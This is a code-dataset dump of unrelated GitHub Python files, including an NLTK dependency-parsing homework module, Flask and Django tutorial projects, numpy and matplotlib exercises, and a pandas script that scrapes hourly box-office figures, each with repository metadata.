| 2019-07-26T16:50:33
| 2014-02-11T22:51:25
|
Python
|
UTF-8
|
Python
| false
| false
| 281
|
py
|
#!/usr/bin/env python
# encoding: utf-8
import sys
import os
# just to temporarily change PYTHONPATH without installing
sys.path.append(os.path.expanduser('~') + '/Dropbox/NREL/RotorSE/src/rotorse')
# 1 ---
from rotoraero import RotorAeroVSVP
rotor = RotorAeroVSVP()
# 1 ---
|
[
"andrew.ning@nrel.gov"
] |
andrew.ning@nrel.gov
|
7f3f1ecdf11cd198d1eca349180cc1b2698f1eb2
|
89e47e1a0dd8ca96dbaf236340dd1c7732bf62db
|
/depgraph.py
|
3e06a8e5882d7cf7e8b89a80823d5763de43df8c
|
[] |
no_license
|
cmps143-nlp/homework_8
|
44f2f8e515a02134765e2f5563a8417052e6ea90
|
da037a754212545405db8a084ecb91659f47bad3
|
refs/heads/master
| 2021-01-10T13:06:17.416478
| 2015-06-06T20:32:01
| 2015-06-06T20:32:01
| 36,994,378
| 0
| 0
| null | 2015-06-08T22:20:06
| 2015-06-06T20:36:12
|
Python
|
UTF-8
|
Python
| false
| false
| 10,171
|
py
|
#!/usr/bin/env python
'''
Created on May 14, 2014
@author: reid
'''
import os, re, sys, nltk, operator
from nltk.parse import DependencyGraph
from nltk.stem.wordnet import WordNetLemmatizer
import utils
import baseline as bl
import hw6
# Note: the dependency tags return by Stanford Parser are slightly different than
# what NLTK expects. We tried to change all of them, but in case we missed any, this
# method should correct them for you.
def update_inconsistent_tags(old):
return old.replace("root", "ROOT")
# Read the lines of an individual dependency parse
def read_dep(fh):
dep_lines = []
qid = None
first = True
for line in fh:
#if(first): print (line)
line = line.strip()
if len(line) == 0:
#print("\n".join(dep_lines))
#input('>')
return (update_inconsistent_tags("\n".join(dep_lines)), qid)
elif re.match(r"^QuestionId:\s+(.*)$",line):
# You would want to get the question id here and store it with the parse
qid = line[len("QuestionID: "):len(line)]
continue
dep_lines.append(line)
return (update_inconsistent_tags("\n".join(dep_lines)), qid) if len(dep_lines) > 0 else (None,qid)
# Read the dependency parses from a file
def read_dep_parses(depfile):
fh = open(depfile, 'r')
# list to store the results
graphs = []
qgraphs = {}
# Read the lines containing the first parse.
dep,qid = read_dep(fh)
# print(dep)
# graph = DependencyGraph("""There EX 3 expl
# once RB 3 advmod
# was VBD 0 ROOT
# a DT 5 det
# crow NN 3 nsubj""")
# graphs.append(graph)
# While there are more lines:
# 1) create the DependencyGraph
# 2) add it to our list
# 3) try again until we're done
while dep is not None:
graph = DependencyGraph(dep)
if(qid):
qgraphs[qid] = graph
else:
graphs.append(graph)
dep,qid = read_dep(fh)
fh.close()
return graphs if len(qgraphs.items()) < 1 else qgraphs
def get_relation(dgraph, node, rel):
#node['deps'][rel]
i = node['deps'][rel][0]
return node_ati(dgraph, i)
def find_relation(graph, rel, root=None):
''' finds nodes related to root with relation rel.
root defaults to entire graph root.'''
if root:
node_list = root.deps()
else:
node_list = graph.nodes.values()
nodes = []
for node in node_list:
if not 'rel' in node.keys():
continue
if node['rel'] == rel:
nodes.append(node)
return nodes
def node_ati(graph, index):
''' returns the node object with address = index if it exists,
otherwise returns None. '''
for node in graph.nodes.values():
if node['address'] == index:
return node
return None
def find_main(graph):
for node in graph.nodes.values():
if node['rel'] == 'ROOT':
return node
return None
def find_nodeByWord(word, graph, overlap=False, tag='VB'):
nodelist = []
#print('word: ', word)
for node in graph.nodes.values():
if not "word" in node.keys():
continue
#if word == 'stood' or word == 'standing':
# print(bl.lemmatize(word, tag) , bl.lemmatize(node["word"], node["tag"]))
w1, t = bl.lemmatize(word, tag)
w2, t = bl.lemmatize(node["word"], node["tag"])
if node["word"] == word:
nodelist.append(node)
elif w1 == w2:
'''print(node)
print(w1, w2)
print('.')'''
nodelist.append(node)
elif overlap:
#print('w1: ', word, '\tw2: ', node["word"])
if utils.overlap(word, node["word"], 3):
#print('overlp: ', node)
nodelist.append(node)
'''else:
synonyms = bl.getSyns(word)
if node['word'] in synonyms:
nodelist.append(node) '''
return nodelist
def good_address(lst, addr):
size = len(lst)
return 0<= addr and addr < size
def get_neighbors(lst, a, n):
res = []
for i in range(n):
# range starts at zeor so add 1.
if good_address(lst, a +i +1):
res.append(lst[ a+i +1])
if good_address(lst, a -i -1):
res.append(lst[ a-i -1])
return res
def get_dependents_shallow(node, graph, dmax, depth, n):
results = []
if depth > dmax:
return results
for item in node["deps"]:
address = node["deps"][item][0]
results += get_neighbors(graph.nodes, address, n)
dep = graph.nodes[address]
results.append(dep)
results = results + get_dependents_shallow(dep, graph, dmax, depth+1, n)
return results
def graph2sent(sgraph):
''' returns a pos tagged and lower()ed sentence. '''
words = []
words = [ ((node['word']).lower(), node['tag']) for node in sgraph.nodes.values()
if 'word' in node.keys() if 'tag' in node.keys() if node['word'] ]
#for node in sgraph.nodes.values():
# if 'word' in node.keys() and 'tag' in node.keys():
# words.append(((node['word']).lower(), node['tag']))
return words
def get_segment_after_word( vnode, sent):
# sch sentences are short so return everthing following the verb.
#if qtype == 'sch':
ans = [w[0] for w in sent]
addr = vnode['address'] +1
wanted = set(['DT', 'TO', 'IN'])
# also add the previous word if it is a determinr
if sent[addr-1][1] in wanted:
addr -= 1
ans = ans[addr : addr+10]
return " ".join(ans).rstrip(' .,!\n?')
def get_dependents(node, graph):
results = []
for item in node["deps"]:
address = node["deps"][item][0]
dep = graph.nodes[address]
results.append(dep)
results = results + get_dependents(dep, graph)
return results
def get_relatives(graph, rel, i=0, pos=None):
relatives = find_relation(graph, rel)
if pos:
for r_node in relatives:
n = node_ati(graph, r_node['address'] -i)
if n['tag'] == pos:
relatives.append(n)
return [r["word"] for r in relatives]
def get_all_byWord(glist, target_word):
targlist = []
length = len(glist)
for g in range(length):
nodes = find_nodeByWord(target_word, glist[g])
if len(nodes) > 0:
targlist.append((nodes, g))
return targlist
def find_answer(qgraph, sgraph):
#print('qgraph: \n', qgraph, '\n')
qmain = find_main(qgraph)
assert qmain
#print('qmain: \n',qmain, '\n')
qword = qmain["word"]
#print('qword: ', qword)
#print(type(sgraph))
#print('sgraph: \n', sgraph)
snode = None
try:
snode = find_nodeByWord(qword, sgraph)
except KeyError:
#print('qgraph: ', qgraph)
#print()
#print('sgraph: ', sgraph)
#input('>')
pass
if not snode:
print('error: find_answer() not snode')
return None
for node in sgraph.nodes.values():
#print("node in nodelist:", node)
#print(type(node))
if node.get('head', None) == snode["address"]:
#print("Our parent is:", snode)
#print("Our relation is:", node['rel'])
if node['rel'] == "prep":
deps = get_dependents(node, sgraph)
deps = sorted(deps, key=operator.itemgetter("address"))
return " ".join(dep["word"] for dep in deps)
def find_answer2(qgraph, sgraph):
qmain = find_main(qgraph)
deps = get_dependents_shallow(qmain, sgraph, 3, 0, 0)
#deps = sorted(deps, key=operator.itemgetter("address"))
deps = set(dep['word'].lower() for dep in deps if 'word' in dep.keys() if dep['word'])
return " ".join( w for w in deps )#if dep['word'])
def load_dep_files(file_extension):
dep_graphs = {}
for filename in os.listdir("."):
if filename.endswith(file_extension):
graphs = read_dep_parses(filename)
if file_extension == ".questions.dep":
dep_graphs.update(graphs)
else:
dep_graphs[filename[:-len(file_extension)]]= graphs
#print(dep_graphs)
#input('>')
return dep_graphs
def load_all_deps():
sch_deps_extension = ".sch.dep"
story_deps_extension = ".story.dep"
q_deps_extension = ".questions.dep"
sdeps = {}
sdeps['sch'] = load_dep_files(sch_deps_extension)
sdeps['story'] = load_dep_files(story_deps_extension)
qdeps = load_dep_files(q_deps_extension)
return sdeps, qdeps
def find_q(qlist, target):
for q, i in zip(qlist, range(len(qlist))):
if q.qid == target:
return i
return None
if __name__ == '__main__':
text_file = "fables-01.story"
dep_file = "fables-01.story.dep"
q_file = "fables-01.questions.dep"
# dict
sgraphs = read_dep_parses(dep_file)
# list
qgraphs = read_dep_parses(q_file)
# Get the question
questions = hw6.load_questions()
i = find_q(questions, 'fables-01-2')
question = questions[i]
assert question
print('question: ')
print(question)
# qgraph is a dict not a list
qgraph = qgraphs['fables-01-2']
#print("qgraph: ",qgraph)
# find the sentence containing the answer
#qsent = bl.get_sentences(question)[0]
"""
sgraph = sgraphs[1]
lmtzr = WordNetLemmatizer()
for node in sgraph.nodes.values():
tag = node["tag"]
word = node["word"]
if word is not None:
if tag.startswith("V"):
print(lmtzr.lemmatize(word, 'v'))
else:
print(lmtzr.lemmatize(word, 'n'))
print()
answer = find_answer(qgraph, sgraph)
print(answer)
"""
|
[
"davan108@yahoo.com"
] |
davan108@yahoo.com
|
52d16b684f2d333ae0f84ce5dc7dc796dd3d14e9
|
f7c462bf748bf4e2d59f460cda61b357f40059fb
|
/Realtime Graph.py
|
efe195af25e1593f06e837e64d51042c97d8a147
|
[] |
no_license
|
bormanjo/Project-Gamma
|
80aca334c82d9fdc971fc23e2db90b962e6ec603
|
f8bf7d1f53360bb46ab74aedbff36698c1b3491a
|
refs/heads/master
| 2016-08-11T20:14:07.299798
| 2016-02-02T19:03:59
| 2016-02-02T19:03:59
| 44,758,088
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 523
|
py
|
import sys
sys.path.append('/Users/jzmanrulz/anaconda/lib/python3.4/site-packages')
import matplotlib.pyplot as plt
import numpy as np
import time
fig = plt.figure()
ax = fig.add_subplot(111)
x = np.arange(10000)
y = np.random.randn(10000)
li, = ax.plot(x,y)
fig.canvas.draw()
plt.show()
while True:
try:
y[:-10] = y[10:]
y[-10:] = np.random.randn(10)
li.set_ydata(y)
fig.canvas.draw()
time.sleep(0.01)
except KeyboardInterrupt:
break
|
[
"jzmanrulz@gmail.com"
] |
jzmanrulz@gmail.com
|
7b434b2719c36ca20ea15fa5da601a27eef6411d
|
155cbccc3ef3b8cba80629f2a26d7e76968a639c
|
/thelma/tests/functional/test_rack.py
|
e40ebb879314b508491ce9ef3818b992627c074b
|
[
"MIT"
] |
permissive
|
papagr/TheLMA
|
1fc65f0a7d3a4b7f9bb2d201259efe5568c2bf78
|
d2dc7a478ee5d24ccf3cc680888e712d482321d0
|
refs/heads/master
| 2022-12-24T20:05:28.229303
| 2020-09-26T13:57:48
| 2020-09-26T13:57:48
| 279,159,864
| 1
| 0
|
MIT
| 2020-07-12T22:40:36
| 2020-07-12T22:40:35
| null |
UTF-8
|
Python
| false
| false
| 1,605
|
py
|
"""
Created on Dec 09, 2014.
"""
from pyramid.httpexceptions import HTTPOk
from everest.mime import XmlMime
from everest.resources.utils import get_root_collection
from thelma.interfaces import ITubeRack
from thelma.tests.functional.conftest import TestFunctionalBase
class TestRackFunctional(TestFunctionalBase):
path = '/tube-racks'
setup_rdb_context = True
def test_load_racks(self, app_creator):
rsp = app_creator.get(self.path,
params=dict(size=10),
status=HTTPOk.code)
assert not rsp is None
def test_patch_set_location(self, app_creator,
rack_patch_set_location_data):
rack_bc = '02490469'
loc_id = 1513
rsp = app_creator.patch('%s/%s' % (self.path, rack_bc),
params=rack_patch_set_location_data,
content_type=XmlMime.mime_type_string,
status=HTTPOk.code)
assert not rsp is None
coll = get_root_collection(ITubeRack)
rack = coll[rack_bc]
lr = rack.get_entity().location_rack
assert not lr is None
assert lr.location.id == loc_id
def test_patch_unset_location(self, app_creator):
rack_bc = '02481966'
rsp = app_creator.delete('%s/%s/location' % (self.path, rack_bc),
status=HTTPOk.code)
assert not rsp is None
coll = get_root_collection(ITubeRack)
rack = coll[rack_bc]
assert rack.get_entity().location_rack is None
|
[
"fogathmann@gmail.com"
] |
fogathmann@gmail.com
|
a5aa4f455c320dad648c0b6b8b039c70ad37babc
|
2c956da7e4ebd03ba1bdaa9f72d58c5b5d8190f4
|
/logica.py
|
6e70615e0061ae35b94a3bc91ae1085ecb101e2b
|
[] |
no_license
|
jlcastr/dacodeslogica
|
f1c9ef04df815a7727915575c194c3c7ee03d3b4
|
d632d2c94e392c2ab9a24fc175645471c312a794
|
refs/heads/master
| 2022-11-29T11:24:54.125335
| 2020-07-30T16:54:28
| 2020-07-30T16:54:28
| 283,722,418
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 578
|
py
|
#esquina superior de una cuadricula N x M
#mirando a la derecha, sigue camiando un cuadro a la vez en la direccion que esta mirando
#(dirección derecha)
#----------------------
#|(0,0)|(0,1)|(0,2)|
#|(1,0)|(1,1)|(1,2)|
#|(2,0)|(2,1)|(2,2)|
#---------------------
def recorrido(N,M):
if (N > M):
if (M % 2 == 0):
print('Arriba')
else:
print('Abajo')
else:
if (N%2== 0):
print('Izquierda')
else:
print('Derecha')
#recorrido(0,4)
recorrido(1,1)
recorrido(2,2)
recorrido(3,1)
recorrido(3,3)
|
[
"jlcastr7@gmail.com"
] |
jlcastr7@gmail.com
|
8d9df479c2b41b52b6d9e48842ac8f49b3981495
|
a1565d1736ed9ce98c2bec48fcd21b9ad491aca5
|
/MediaTrailers/MediaTrailers/runserver.py
|
3fc9d6fb157f32afde80c22d5668e7f698fc347a
|
[] |
no_license
|
dmatis/media-trailers
|
5461f81c7a01b09511c377f08dc1cf191b569031
|
5d16694cc67dc2602b93938e915233bedab6b6e6
|
refs/heads/master
| 2020-07-03T17:28:32.258258
| 2016-09-02T21:09:12
| 2016-09-02T21:09:12
| 66,577,999
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 347
|
py
|
"""
This script runs the MediaTrailers application using a development server.
"""
from os import environ
from MediaTrailers import app
if __name__ == '__main__':
HOST = environ.get('SERVER_HOST', 'localhost')
try:
PORT = int(environ.get('SERVER_PORT', '5555'))
except ValueError:
PORT = 5555
app.run(HOST, PORT)
|
[
"darren.matis@gmail.com"
] |
darren.matis@gmail.com
|
1b23c7b7ea9eb0f9ac3e173e043db613b169fb22
|
1a4fb457cdbd1ac5851a6a7cf7a8824f5c3cb946
|
/numpy/npOperation.py
|
545a5472e2a29e3c5a74e428b93a985295510c4b
|
[] |
no_license
|
nlhsueh/Learn-Python
|
2cce28b1c3afb39280da647cae8314efa3f8f5fa
|
fded46c9553691370fff443a6748b7f73195c766
|
refs/heads/master
| 2021-09-12T06:52:34.988760
| 2018-04-15T02:35:24
| 2018-04-15T02:35:24
| 105,233,608
| 2
| 5
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 845
|
py
|
import numpy as np
# +-*/
a = np.arange(5)
b = np.arange(5)
c = a + b
print (c) # [0 2 4 6 8]
c = a - b
print (c) # [0 0 0 0 0]
c = a * b
print (c) # [0 1 4 9 16]
c = a**3
print (c) # [0 1 8 27 64]
c = a > 3
print (c) # [False False False False True]
# reshape
a = np.arange(6).reshape(2,3)
print (a)
# [[0 1 2]
# [3 4 5]]
print (a[0]) # [0 1 2]
print (a[0, 1]) # 1
print (a[0, 1:3]) # [1 2]
# MEAN, MIN, MAX
a = np.array([[34, 12, 90], [20, 56, 90], [45, 56, 92], [1, 2, 3]])
print ('min and max: ', np.min(a), a.max())
print ('mean: ', a.mean())
print ('column mean: ', a.mean(axis = 0))
print ('row mean: ', a.mean(axis = 1))
print ('sort: ', np.sort(a))
p = a > 60
print (p)
a[a > 60]
# transport
a = np.array([[34, 12, 90], [20, 56, 90], [45, 56, 92], [1, 2, 3]])
print (a.T)
# [[34 20 45 1]
# [12 56 56 2]
# [90 90 92 3]]
|
[
"nlhsueh@fcu.edu.tw"
] |
nlhsueh@fcu.edu.tw
|
cf53086f857ba3246e025162e7ecf389e4e1067e
|
5ecaa750834898e8c58bd00d1e820c6e6bd4ef94
|
/gene_selection/sort_snp_list.py
|
546f5000a6aabe7634eb515da568d65b811bf419
|
[] |
no_license
|
SaundersLab/MARPLE_plant_pathogen_diagnostics
|
d7cbe4aa5a59a24773d1f6f8556ed4fd6fdf7b09
|
4896ed9ecf9b71c561aa387d5fd8e0b357ae3df4
|
refs/heads/master
| 2022-04-14T22:07:11.994622
| 2020-02-20T21:06:53
| 2020-02-20T21:06:53
| 171,909,384
| 0
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 234
|
py
|
#!/usr/bin/env python
import pandas as pd
import sys
input_table = pd.read_table(sys.argv[1],header=0)
sorted_table=input_table.sort_values(['Gene', 'Position'])
sorted_table.to_csv(sys.argv[1]+'.sorted.tsv',index=False, sep='\t')
|
[
"gradhakr@users.noreply.github.com"
] |
gradhakr@users.noreply.github.com
|
e545e3353d0b386f0cd6a6971d5403a849d55d35
|
7e7661c1f4ba682291ddf46851cd319777f33ca0
|
/week_one/print.py
|
447843549021409edfc89715124f6d521466f2d9
|
[] |
no_license
|
MikeDrewitt/python_seminar
|
87c57d335001e95a4d30b9b57c5a6a35dd80a1ac
|
9be405699468fc9701aaab33a2d0de4ed9da1b9c
|
refs/heads/master
| 2021-01-21T09:06:55.403066
| 2017-05-02T23:06:36
| 2017-05-02T23:06:36
| 82,864,654
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 56
|
py
|
# This is how you print in python
print("hello world!")
|
[
"mikedrewitt@gmail.com"
] |
mikedrewitt@gmail.com
|
11a7e8f0fb7b4ee2f2cd6194fa11e6cfa562f5f0
|
e325822e10d8343486cff3276c240272f4d6e3a0
|
/flask/tutorial/app.py
|
763f335afb76ab231c1a9b76d4e024eed7c96e85
|
[] |
no_license
|
EunhaKyeong/studyRepo
|
c9b25d19c8a9c62351b48bef3417177adad8a933
|
f8a252cff479d828bb2811f47419ea7d0d5f7718
|
refs/heads/master
| 2023-02-22T01:57:41.939452
| 2021-01-19T11:33:16
| 2021-01-19T11:33:16
| 301,754,097
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 898
|
py
|
from flask import Flask, render_template, request
#Flask 객체 인스턴스 생성
app = Flask(__name__)
#localhost/ url에 접속해 index.html 페이지로 이동.
#웹 페이지를 하나씩 추가할 때마다 @app.rount()를 추가하고 아래 함수를 작성해야 함.
@app.route('/')
def index():
return render_template('index.html')
@app.route("/post", methods=['POST'])
def post():
user = request.form['user']
data = {'level':60, 'point':360, 'exp':45000}
return render_template('post.html', user=user, data=data)
@app.route("/get", methods=['GET'])
def get():
user = "반원"
data = {'level':60, 'point':360, 'exp':45000}
return render_template('get.html', user=user, data=data)
if __name__ == "__main__":
#서버 실행
app.run(debug=True)
#host를 직접 지정하고 싶으면
#app.run(host="127.0.0.1", port="5000", debug=True)
|
[
"eunha4685@naver.com"
] |
eunha4685@naver.com
|
ca0ce7609cecd3ff3ec45ee5766b4208758b3485
|
dc82eb85df2342ef904b2993cf0ee619b2a470eb
|
/lab6/numberorder.py
|
1f60c5087477f14b815ee67b0311f931aff6e713
|
[] |
no_license
|
djstull/COMS127
|
e643037ae778632d7b8f9ff3a8d509129f3aa4ef
|
4c5129bee3f55c11f96b870ab354b565e6f2297b
|
refs/heads/master
| 2020-03-28T02:24:23.963125
| 2018-12-06T21:33:23
| 2018-12-06T21:33:23
| 147,567,738
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 209
|
py
|
def numberorder(numbers):
for i in range( len(numbers) - 1):
if numbers[i] < numbers[i+1]:
return False
return True
print(numberorder([3, 2, 1])
print(numberorder([1, 2, ]))
|
[
"djstull@iastate.edu"
] |
djstull@iastate.edu
|
ff13c2abde11b7d35c4fe06755453b0a10b65b15
|
83d6dd1343f708994541ece6390cef6fa9f56131
|
/blackjack/api/event/after_turn_event.py
|
30e83a3effcd06b74f60d501844864f9305792db
|
[] |
no_license
|
egorklimov/blackjack
|
e33340d91aac75bf8d4d7f2200496fce54712662
|
30fd62974be59e889078d796bc87e201633992fa
|
refs/heads/master
| 2023-04-25T11:05:38.902072
| 2021-05-04T22:50:07
| 2021-05-04T22:50:07
| 341,987,129
| 0
| 0
| null | 2021-05-04T19:24:34
| 2021-02-24T17:54:28
|
Python
|
UTF-8
|
Python
| false
| false
| 33
|
py
|
class AfterTurnEvent():
pass
|
[
"klimovgeor@yandex.ru"
] |
klimovgeor@yandex.ru
|
7fb4e3e6d436cb17f649d2fc95b4196a1cf239a4
|
f53fbf82c8c028f5493bcfdf710578d0d3cb686e
|
/mysite/settings.py
|
9c787f84c688b0a6f8aca8d8641d3b58de290c23
|
[] |
no_license
|
window-dragon/blog
|
4479f0d1afecaf0447f8972385634ee7d658e0aa
|
c58748f1c9dd5fd371e276063f7a131093a9e21f
|
refs/heads/master
| 2022-05-11T13:50:02.545032
| 2019-03-05T12:59:39
| 2019-03-05T12:59:39
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,154
|
py
|
"""
Django settings for mysite project.
Generated by 'django-admin startproject' using Django 2.1.7.
For more information on this file, see
https://docs.djangoproject.com/en/2.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.1/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 't7epu1jvkd(ynp%pu$*6+5r)9wlgjsn)bl%ww#!bw^6$4k0w$l'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'blog',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'mysite.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'mysite.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.1/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'Asia/Seoul'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.1/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, 'static')
|
[
"core.jeong@samsung.com"
] |
core.jeong@samsung.com
|
88b482164e4af4a7796048ebb8cd38c827e1e1e6
|
10580fdc5ab97755220910c30016493f76359ad6
|
/portfolio/settings.py
|
d90db1e3f722415037c64da86d81d48a4ae62f7a
|
[] |
no_license
|
zhlooooo/portfolio
|
650632d0f7065afaa907e14f654dabe8bf4af2ee
|
c16aaa57d40d3b7a8a8d89b1407b6929266466fa
|
refs/heads/master
| 2020-08-13T10:07:40.430908
| 2019-10-14T08:50:50
| 2019-10-14T08:50:50
| 214,383,005
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,211
|
py
|
"""
Django settings for portfolio project.
Generated by 'django-admin startproject' using Django 2.2.5.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.2/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'fjmv2-9eb1_6npd#+xmc^lmcb1tm=o$3zk(fo9%m1=t!!xd1c^'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'gallery.apps.GalleryConfig',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'portfolio.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': ['templates'],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'portfolio.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/
STATIC_URL = '/static/'
MEDIA_URL = '/media/'
MEDIA_ROOT = os.path.join(BASE_DIR, 'media')
|
[
"zhlooooo@126.com"
] |
zhlooooo@126.com
|
3295098797be67f18cbf21f8eccd11345ce99a07
|
c68a31a97fdd126261f5d12004f1477073ca4058
|
/box_office.py
|
ef956b80a376ef64aab0ea9bc3160fd9a545c8d6
|
[] |
no_license
|
zhuo2015/box_office_predicate
|
4f03efb1bc1e003809b9a977d9a28ffb3d215ea3
|
0a6c25de55a55e90be8949477ed4d86b349ec8da
|
refs/heads/master
| 2021-01-23T07:51:42.821240
| 2017-01-31T15:28:54
| 2017-01-31T15:28:54
| 80,519,273
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 494
|
py
|
# coding:utf-8
# (fix: was "uft-8", which is not a valid codec name and would make the
# encoding declaration ineffective)
import pandas as pd
import requests

# Example URL with an explicit timestamp query parameter; kept for reference
# but unused — the bare endpoint below returns the current figures.
json11 = "http://www.cbooo.cn/BoxOffice/GetHourBoxOffice?d=1485874026355"
url_xml = 'http://www.cbooo.cn/BoxOffice/GetHourBoxOffice'

# Fetch the hourly box-office JSON and load the 'data2' records.
tt = requests.get(url_xml)
ss = tt.json()
ddf = pd.DataFrame(ss['data2'])
# Chinese column labels; 'xxx' marks columns we do not care about.
ddf.columns = ['实时票房', '排名', 'xxx', '片名', '票房占比', 'xxx', '上映天数', '累计票房']
del ddf['xxx']  # removes every column labelled 'xxx'
# Fix: reindex() returns a new DataFrame — the original call discarded the
# result, so the column reordering never took effect. ('xxxid' was dropped
# from the list: no such column exists, it would only add a NaN column.)
ddf = ddf.reindex(columns=['排名', '片名', '实时票房', '票房占比', '上映天数', '累计票房'])
|
[
"lizhuo.guo@gmail.com"
] |
lizhuo.guo@gmail.com
|
3a76e89ee62728238df4a79fdf06721e3beb38c3
|
9dc02b09fd114db62539346fe1e048094511958a
|
/sql_orm/manage.py
|
cf62761fd3c18a0fce70316f963967e165cdad7d
|
[] |
no_license
|
jscpy/PythonRules
|
afa88bfb3d736b6af5cbb082bd27c2f949fb97b6
|
72cb9bad837a33d8e778151d7017632013ca6ad7
|
refs/heads/master
| 2021-01-10T09:24:55.223882
| 2016-01-31T20:13:47
| 2016-01-31T20:13:47
| 46,196,617
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 250
|
py
|
#!/usr/bin/env python
"""Command-line entry point for the sql_orm Django project."""
import os
import sys


def main():
    """Point Django at this project's settings and run the management CLI."""
    os.environ.setdefault("DJANGO_SETTINGS_MODULE", "sql_orm.settings")
    from django.core.management import execute_from_command_line
    execute_from_command_line(sys.argv)


if __name__ == "__main__":
    main()
|
[
"jsc.py.14@gmail.com"
] |
jsc.py.14@gmail.com
|
54b0d750a04237f92f7be27b78755fc8b5a6a181
|
ea0d1c159f93e4b0eed5b370632ed64c9306d969
|
/raspberry/test/sensor/find_device.py
|
a5be6cda7ade5515bd9064b7361c4b2c3d0651b6
|
[] |
no_license
|
jes9401/UleungCare
|
0e00ef7eac3a4ee5b3414f77bc3a95b7fe1065db
|
ce2161056d8aef9b0778ef5cbdc76413f53a092d
|
refs/heads/master
| 2022-11-23T20:37:10.852977
| 2020-08-01T04:49:50
| 2020-08-01T04:49:50
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 313
